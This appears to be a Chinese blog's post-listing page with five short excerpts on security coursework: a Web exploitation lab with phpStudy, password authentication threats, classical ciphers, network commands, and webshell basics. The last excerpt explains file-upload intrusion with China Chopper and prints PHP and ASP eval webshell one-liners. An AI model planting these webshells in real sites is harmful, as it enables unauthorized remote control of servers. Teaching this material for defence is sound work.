- 博客(5)
- 收藏
- 关注
RSS订阅原创 2021-05-07
Web漏洞利用——实验过程实验准备安装phpstudy,安装完成后启动phpStudy主界面,当看到Apache 和 MySQL 文字后面红色的圆点变成绿色时,表示服务启动成功。如下图所示:
2021-05-07 14:14:03
119
原创 2021-05-07
身份认证与口令加密基于口令的认证基于口令的认证方式是较常用的一种技术。在最初阶段,用户首先在系统中注册自己的用户名和登录口令。系统将用户名和口令存储在内部数据库中,注意这个口令一般是长期有效的,因此也称为静态口令。基于静态口令的身份认证技术因其简单和低成本而得到了广泛的使用。但这种方式存在严重的安全问题, 安全性仅依赖于口令,口令一旦泄露,用户就可能被假冒。因此基于口令的身份认证容易遭受如下安全威胁。(1)暴力破解。在暴力破解中所使用的字典是字符串的全集,对可能存在的所有组合进行猜测,直
2021-05-07 12:26:45
337
原创 2021-05-07
古典加密算法对称加密所谓对称加密,粗略来说是指的是两方通信时(如Alice和Bob两人),预先持有相同的密钥(secret key)并希望其在公开渠道通信期间的消息他人无法知晓内容。相关的术语见下图:特别需要指出的是,加密的算法是公开的,其通信的保密性基于密钥的保密性。相关算法恺撒密码(Caesar Cipher)基于置换 密钥为 [0,26) 的整数,密钥为零时明文密文相同 加密过程:对于每个单字母进行移位(过z回a) 解密过程:反向移位 破解方式:暴力枚举即可波雷费
2021-05-07 10:14:45
3023
1
原创 2021-05-06
常见的网络命令——课后补充1、ping命令ping是个使用频率极高的实用程序,主要用于确定网络的连通性。这对确定网络是否正确连接,以及网络连接的状况十分有用。简单的说,ping就是一个测试程序,如果ping运行正确,大体上就可以排除网络访问层、网卡、Modem的输入输出线路、电缆和路由器等存在的故障,从而缩小问题的范围。Ping能够以毫秒为单位显示发送回送请求到返回回送应答之间的时间量。如果应答时间短,表示数据报不必通过太多的路由器或网络连接速度比较快。ping命令的常用参数选项ping
2021-05-06 21:48:17
103
原创 2021-05-06
一句话木马基本操作利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀即可获取并且控制整个网站目录。其中,只要攻击者满足三个条件,就能实现成功入侵:木马上传成功,未被杀; 知道木马的路径在哪; 上传的木马能正常运行。常见的一句话木马: php的一句话木马: <?php @eval($_POST['pass']);?>asp的一句话是: <%eval request ("pass")%>aspx的一句话是: <%@ ..
2021-05-06 20:12:05
131
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人